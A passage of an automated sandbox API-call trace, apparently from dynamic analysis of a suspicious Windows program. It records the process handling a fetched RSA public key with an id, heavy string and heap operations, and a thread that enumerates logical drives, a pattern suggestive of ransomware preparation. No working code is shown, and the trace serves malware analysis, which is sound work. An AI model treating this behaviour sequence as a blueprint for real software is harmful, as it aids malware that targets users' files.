KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0225.761] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0225.761] lstrlenA (lpString="\",\"id\":\"") returned 8 [0225.761] lstrcpyA (in: lpString1=0x989ab78, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0225.761] lstrcpyA (in: lpString1=0x989a778, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0225.761] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.761] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.761] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.761] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.761] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.762] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x69c408 [0225.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x854) returned 0x31c3a98 [0225.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x69c408, cbMultiByte=-1, lpWideCharStr=0x31c3a98, cchWideChar=1066 | out: lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 43 [0225.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x31d1fc8 [0225.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3a98 | out: hHeap=0x630000) returned 1 [0225.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69c408 | out: hHeap=0x630000) returned 1 [0225.763] lstrcpyW (in: lpString1=0x521cf0, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0225.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d1fc8 | out: hHeap=0x630000) returned 1 [0225.763] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0225.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x56) returned 0x31d6570 [0225.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x989a778, cbMultiByte=-1, lpWideCharStr=0x31d6570, cchWideChar=43 | out: lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 43 [0225.763] lstrcpyW (in: lpString1=0x521cf0, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0225.763] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0225.763] lstrlenW (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned 40 [0225.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3280 | out: hHeap=0x630000) returned 1 Thread: id = 203 os_tid = 0x314 [0226.273] timeGetTime () returned 0x1138bdb [0226.273] GetLastError () returned 0x54f [0226.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3bc) returned 0x31c3a98 [0226.273] GetCurrentThreadId () returned 0x314 [0226.273] SetLastError (dwErrCode=0x54f) [0226.273] Sleep (dwMilliseconds=0x0) [0226.277] Sleep (dwMilliseconds=0x3e8) [0227.310] GetLogicalDrives () returned 0x4 [0227.311] SetErrorMode (uMode=0x1) returned 0x0 [0227.311] PathFileExistsA (pszPath="C:\\") returned 1 [0227.311] SetErrorMode (uMode=0x0) returned 0x1 [0227.311] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0227.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x806) returned 0x37b0468 [0227.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3adfe60, cbMultiByte=-1, lpWideCharStr=0x37b0468, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0227.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0d08 [0227.311] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.311] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b0468 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b0468 [0227.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.313] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b0468 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b0468 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b0468 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b0468 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b0468 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b0468 [0227.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.316] 